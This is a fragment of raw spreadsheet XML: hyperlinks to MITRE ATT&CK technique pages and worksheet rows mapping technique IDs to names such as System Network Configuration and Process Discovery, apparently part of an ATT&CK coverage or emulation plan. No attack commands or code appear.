Target="https://attack.mitre.org/techniques/T1178" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1072" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1162" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1137" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1009" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1196" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1005" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1011" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1158" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1085" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1151" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1032" TargetMode="External"/><Relationship Id="rId449" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1199" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1056" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1031" TargetMode="External"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1034" TargetMode="External"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1145" TargetMode="External"/><Relationship Id="rId460" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1102" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1207" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1012" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1211" TargetMode="External"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1062" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1064" TargetMode="External"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1019" TargetMode="External"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1215" TargetMode="External"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1026" TargetMode="External"/><Relationship Id="rId471" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1028" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1155" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1116" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1073" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1109" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1008" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1121" TargetMode="External"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0075" TargetMode="External"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1007" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1156" TargetMode="External"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1161" TargetMode="External"/><Relationship Id="rId440" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1209" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1131" TargetMode="External"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1040" TargetMode="External"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1069" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1106" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1187" TargetMode="External"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1218" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1054" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1037" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1197" TargetMode="External"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1075" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1111" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1088" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1039" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1052" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1147" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1057" TargetMode="External"/><Relationship Id="rId353" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1193" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1095" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1024" TargetMode="External"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1141" TargetMode="External"/><Relationship Id="rId420" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId297" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId462" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1100" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1140" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1068" TargetMode="External"/><Relationship Id="rId322" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1163" TargetMode="External"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1063" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1183" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1017" TargetMode="External"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1142" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1079" TargetMode="External"/><Relationship Id="rId431" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1124" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1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1976-ABA2-FE49-B9D6-64B0DA4C5933}">
  <dimension ref="A1:L71"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScaleNormal="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A45" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="F52" sqref="F52"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.83203125" style="20" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="10.33203125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="22" style="20" customWidth="1"/>
    <col min="4" max="4" width="12.33203125" customWidth="1"/>
    <col min="5" max="5" width="35" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="54.1640625" customWidth="1"/>
    <col min="7" max="8" width="12.33203125" customWidth="1"/>
    <col min="9" max="10" width="14.6640625" customWidth="1"/>
    <col min="11" max="11" width="46.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A1" s="17" t="s">
        <v>851</v>
      </c>
      <c r="B1" s="14" t="s">
        <v>795</v>
      </c>
      <c r="C1" s="18" t="s">
        <v>0</v>
      </c>
      <c r="D1" s="13" t="s">
        <v>1</v>
      </c>
      <c r="E1" s="14" t="s">
        <v>2</v>
      </c>
      <c r="F1" s="14" t="s">
        <v>760</v>
      </c>
      <c r="G1" s="14" t="s">
        <v>804</v>
      </c>
      <c r="H1" s="14" t="s">
        <v>805</v>
      </c>
      <c r="I1" s="14" t="s">
        <v>813</v>
      </c>
      <c r="J1" s="14" t="s">
        <v>814</v>
      </c>
      <c r="K1" s="14" t="s">
        <v>763</v>
      </c>
      <c r="L1" s="14" t="s">
        <v>795</v>
      </c>
    </row>
    <row r="2" spans="1:12" ht="70" x14ac:dyDescent="0.2">
      <c r="A2" s="19" t="s">
        <v>852</v>
      </c>
      <c r="B2" s="16" t="s">
        <v>764</v>
      </c>
      <c r="C2" s="24" t="s">
        <v>848</v>
      </c>
      <c r="D2" s="8" t="s">
        <v>491</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>492</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>857</v>
      </c>
      <c r="G2" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H2" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I2" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J2" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K2" s="7" t="s">
        <v>853</v>
      </c>
      <c r="L2" s="12" t="s">
        <v>764</v>
      </c>
    </row>
    <row r="3" spans="1:12" ht="98" x14ac:dyDescent="0.2">
      <c r="A3" s="19" t="s">
        <v>852</v>
      </c>
      <c r="B3" s="16" t="s">
        <v>765</v>
      </c>
      <c r="C3" s="24" t="s">
        <v>849</v>
      </c>
      <c r="D3" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E3" s="7" t="s">
        <v>114</v>
      </c>
      <c r="F3" s="7" t="s">
        <v>761</v>
      </c>
      <c r="G3" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H3" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I3" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J3" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K3" s="7" t="s">
        <v>731</v>
      </c>
      <c r="L3" s="12" t="s">
        <v>765</v>
      </c>
    </row>
    <row r="4" spans="1:12" ht="98" x14ac:dyDescent="0.2">
      <c r="A4" s="19" t="s">
        <v>852</v>
      </c>
      <c r="B4" s="16" t="s">
        <v>765</v>
      </c>
      <c r="C4" s="24" t="s">
        <v>849</v>
      </c>
      <c r="D4" s="8" t="s">
        <v>545</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>546</v>
      </c>
      <c r="F4" s="7" t="s">
        <v>761</v>
      </c>
      <c r="G4" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H4" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I4" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J4" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K4" s="7" t="s">
        <v>731</v>
      </c>
      <c r="L4" s="12" t="s">
        <v>765</v>
      </c>
    </row>
    <row r="5" spans="1:12" ht="98" x14ac:dyDescent="0.2">
      <c r="A5" s="19" t="s">
        <v>852</v>
      </c>
      <c r="B5" s="16" t="s">
        <v>765</v>
      </c>
      <c r="C5" s="24" t="s">
        <v>849</v>
      </c>
      <c r="D5" s="8" t="s">
        <v>548</v>
      </c>
      <c r="E5" s="7" t="s">
        <v>549</v>
      </c>
      <c r="F5" s="7" t="s">
        <v>761</v>
      </c>
      <c r="G5" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H5" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I5" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J5" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K5" s="7" t="s">
        <v>731</v>
      </c>
      <c r="L5" s="12" t="s">
        <v>765</v>
      </c>
    </row>
    <row r="6" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A6" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B6" s="26" t="s">
        <v>766</v>
      </c>
      <c r="C6" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D6" s="7" t="s">
        <v>6</v>
      </c>
      <c r="E6" s="9" t="str">
        <f>VLOOKUP(D6,Sheet2!A:B,2,0)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="F6" s="10" t="s">
        <v>743</v>
      </c>
      <c r="G6" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H6" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I6" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J6" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K6" s="9" t="s">
        <v>732</v>
      </c>
      <c r="L6" s="12" t="s">
        <v>766</v>
      </c>
    </row>
    <row r="7" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A7" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B7" s="26" t="s">
        <v>767</v>
      </c>
      <c r="C7" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D7" s="11" t="s">
        <v>6</v>
      </c>
      <c r="E7" s="9" t="str">
        <f>VLOOKUP(D7,Sheet2!A:B,2,0)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="F7" s="10" t="s">
        <v>744</v>
      </c>
      <c r="G7" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H7" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I7" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J7" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K7" s="9" t="s">
        <v>733</v>
      </c>
      <c r="L7" s="12" t="s">
        <v>767</v>
      </c>
    </row>
    <row r="8" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A8" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B8" s="26" t="s">
        <v>768</v>
      </c>
      <c r="C8" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D8" s="11" t="s">
        <v>5</v>
      </c>
      <c r="E8" s="9" t="str">
        <f>VLOOKUP(D8,Sheet2!A:B,2,0)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="F8" s="10" t="s">
        <v>680</v>
      </c>
      <c r="G8" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H8" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I8" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J8" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K8" s="9" t="s">
        <v>734</v>
      </c>
      <c r="L8" s="12" t="s">
        <v>768</v>
      </c>
    </row>
    <row r="9" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A9" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B9" s="26" t="s">
        <v>769</v>
      </c>
      <c r="C9" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D9" s="7" t="s">
        <v>9</v>
      </c>
      <c r="E9" s="9" t="str">
        <f>VLOOKUP(D9,Sheet2!A:B,2,0)</f>
        <v>Process Discovery</v>
      </c>
      <c r="F9" s="10" t="s">
        <v>745</v>
      </c>
      <c r="G9" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H9" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I9" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J9" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K9" s="9" t="s">
        <v>735</v>
      </c>
      <c r="L9" s="12" t="s">
        <v>769</v>
      </c>
    </row>
    <row r="10" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A10" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B10" s="26" t="s">
        <v>770</v>
      </c>
      <c r="C10" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D10" s="11" t="s">
        <v>573</v>
      </c>
      <c r="E10" s="9" t="s">
        <v>574</v>
      </c>
      <c r="F10" s="10" t="s">
        <v>737</v>
      </c>
      <c r="G10" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H10" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I10" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J10" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K10" s="9" t="s">
        <v>736</v>
      </c>
      <c r="L10" s="12" t="s">
        <v>770</v>
      </c>
    </row>
    <row r="11" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A11" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B11" s="26" t="s">
        <v>772</v>
      </c>
      <c r="C11" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D11" s="11" t="s">
        <v>491</v>
      </c>
      <c r="E11" s="9" t="s">
        <v>492</v>
      </c>
      <c r="F11" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G11" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H11" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I11" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J11" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K11" s="9" t="s">
        <v>771</v>
      </c>
      <c r="L11" s="12" t="s">
        <v>772</v>
      </c>
    </row>
    <row r="12" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A12" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B12" s="26" t="s">
        <v>773</v>
      </c>
      <c r="C12" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D12" s="11" t="s">
        <v>5</v>
      </c>
      <c r="E12" s="9" t="str">
        <f>VLOOKUP(D12,Sheet2!A:B,2,0)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="F12" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G12" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H12" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I12" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J12" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K12" s="9" t="s">
        <v>682</v>
      </c>
      <c r="L12" s="12" t="s">
        <v>773</v>
      </c>
    </row>
    <row r="13" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A13" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B13" s="26" t="s">
        <v>774</v>
      </c>
      <c r="C13" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D13" s="7" t="s">
        <v>10</v>
      </c>
      <c r="E13" s="9" t="str">
        <f>VLOOKUP(D13,Sheet2!A:B,2,0)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="F13" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G13" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H13" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I13" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J13" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K13" s="9" t="s">
        <v>683</v>
      </c>
      <c r="L13" s="12" t="s">
        <v>774</v>
      </c>
    </row>
    <row r="14" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A14" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B14" s="26" t="s">
        <v>775</v>
      </c>
      <c r="C14" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D14" s="11" t="s">
        <v>410</v>
      </c>
      <c r="E14" s="9" t="s">
        <v>411</v>
      </c>
      <c r="F14" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G14" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H14" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I14" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J14" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K14" s="9" t="s">
        <v>686</v>
      </c>
      <c r="L14" s="12" t="s">
        <v>775</v>
      </c>
    </row>
    <row r="15" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A15" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B15" s="26" t="s">
        <v>776</v>
      </c>
      <c r="C15" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D15" s="11" t="s">
        <v>253</v>
      </c>
      <c r="E15" s="9" t="s">
        <v>254</v>
      </c>
      <c r="F15" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G15" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H15" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I15" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J15" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K15" s="9" t="s">
        <v>685</v>
      </c>
      <c r="L15" s="12" t="s">
        <v>776</v>
      </c>
    </row>
    <row r="16" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A16" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B16" s="26" t="s">
        <v>777</v>
      </c>
      <c r="C16" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D16" s="11" t="s">
        <v>253</v>
      </c>
      <c r="E16" s="9" t="s">
        <v>254</v>
      </c>
      <c r="F16" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G16" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H16" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I16" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J16" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K16" s="9" t="s">
        <v>687</v>
      </c>
      <c r="L16" s="12" t="s">
        <v>777</v>
      </c>
    </row>
    <row r="17" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A17" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B17" s="26" t="s">
        <v>778</v>
      </c>
      <c r="C17" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D17" s="11" t="s">
        <v>102</v>
      </c>
      <c r="E17" s="9" t="s">
        <v>103</v>
      </c>
      <c r="F17" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G17" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H17" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I17" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J17" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K17" s="9" t="s">
        <v>688</v>
      </c>
      <c r="L17" s="12" t="s">
        <v>778</v>
      </c>
    </row>
    <row r="18" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A18" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B18" s="26" t="s">
        <v>779</v>
      </c>
      <c r="C18" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D18" s="11" t="s">
        <v>4</v>
      </c>
      <c r="E18" s="9" t="str">
        <f>VLOOKUP(D18,Sheet2!A:B,2,0)</f>
        <v>System Information Discovery</v>
      </c>
      <c r="F18" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G18" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H18" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I18" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J18" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K18" s="9" t="s">
        <v>684</v>
      </c>
      <c r="L18" s="12" t="s">
        <v>779</v>
      </c>
    </row>
    <row r="19" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A19" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B19" s="26" t="s">
        <v>780</v>
      </c>
      <c r="C19" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D19" s="11" t="s">
        <v>4</v>
      </c>
      <c r="E19" s="9" t="str">
        <f>VLOOKUP(D19,Sheet2!A:B,2,0)</f>
        <v>System Information Discovery</v>
      </c>
      <c r="F19" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G19" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H19" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I19" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J19" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K19" s="9" t="s">
        <v>859</v>
      </c>
      <c r="L19" s="12" t="s">
        <v>780</v>
      </c>
    </row>
    <row r="20" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A20" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B20" s="26" t="s">
        <v>781</v>
      </c>
      <c r="C20" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D20" s="11" t="s">
        <v>7</v>
      </c>
      <c r="E20" s="9" t="str">
